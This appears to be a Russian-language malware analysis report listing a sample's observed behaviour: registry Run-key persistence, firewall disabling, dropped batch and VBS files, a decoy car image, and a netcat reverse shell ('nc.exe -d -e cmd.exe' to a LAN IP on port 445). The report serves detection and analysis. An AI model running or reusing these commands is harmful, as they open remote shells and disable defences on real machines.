Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'RunDll' = '%APPDATA%\igxell.vbs'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
- '<Текущая директория>\nc.exe' -d -e cmd.exe 192.168.1.74 445
- '<SYSTEM32>\cmd.exe' /c ""<Текущая директория>\w.bat" "
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v RunDll /d "%APPDATA%\igxell.vbs" /f
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen <Текущая директория>\bmw-i8-65.jpg
- '<SYSTEM32>\cmd.exe' /c ""<Текущая директория>\z.bat" "
- '<SYSTEM32>\wscript.exe' "<Текущая директория>\rs.vbs"
- '<SYSTEM32>\cmd.exe' /c ""<Текущая директория>\x.bat" "
- '<SYSTEM32>\netsh.exe' firewall set opmode disable
- <Текущая директория>\w.bat
- <Текущая директория>\z.bat
- %HOMEPATH%\Recent\bf32d3b0.lnk
- %HOMEPATH%\Recent\bmw-i8-65.lnk
- <Текущая директория>\rs.vbs
- <Текущая директория>\nc.exe
- <Текущая директория>\x.bat
- <Текущая директория>\bmw-i8-65.jpg
- '<IP-адрес в локальной сети>':445
- ClassName: 'Indicator' WindowName: '(null)'
- ClassName: 'ShImgVw:CPreviewWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'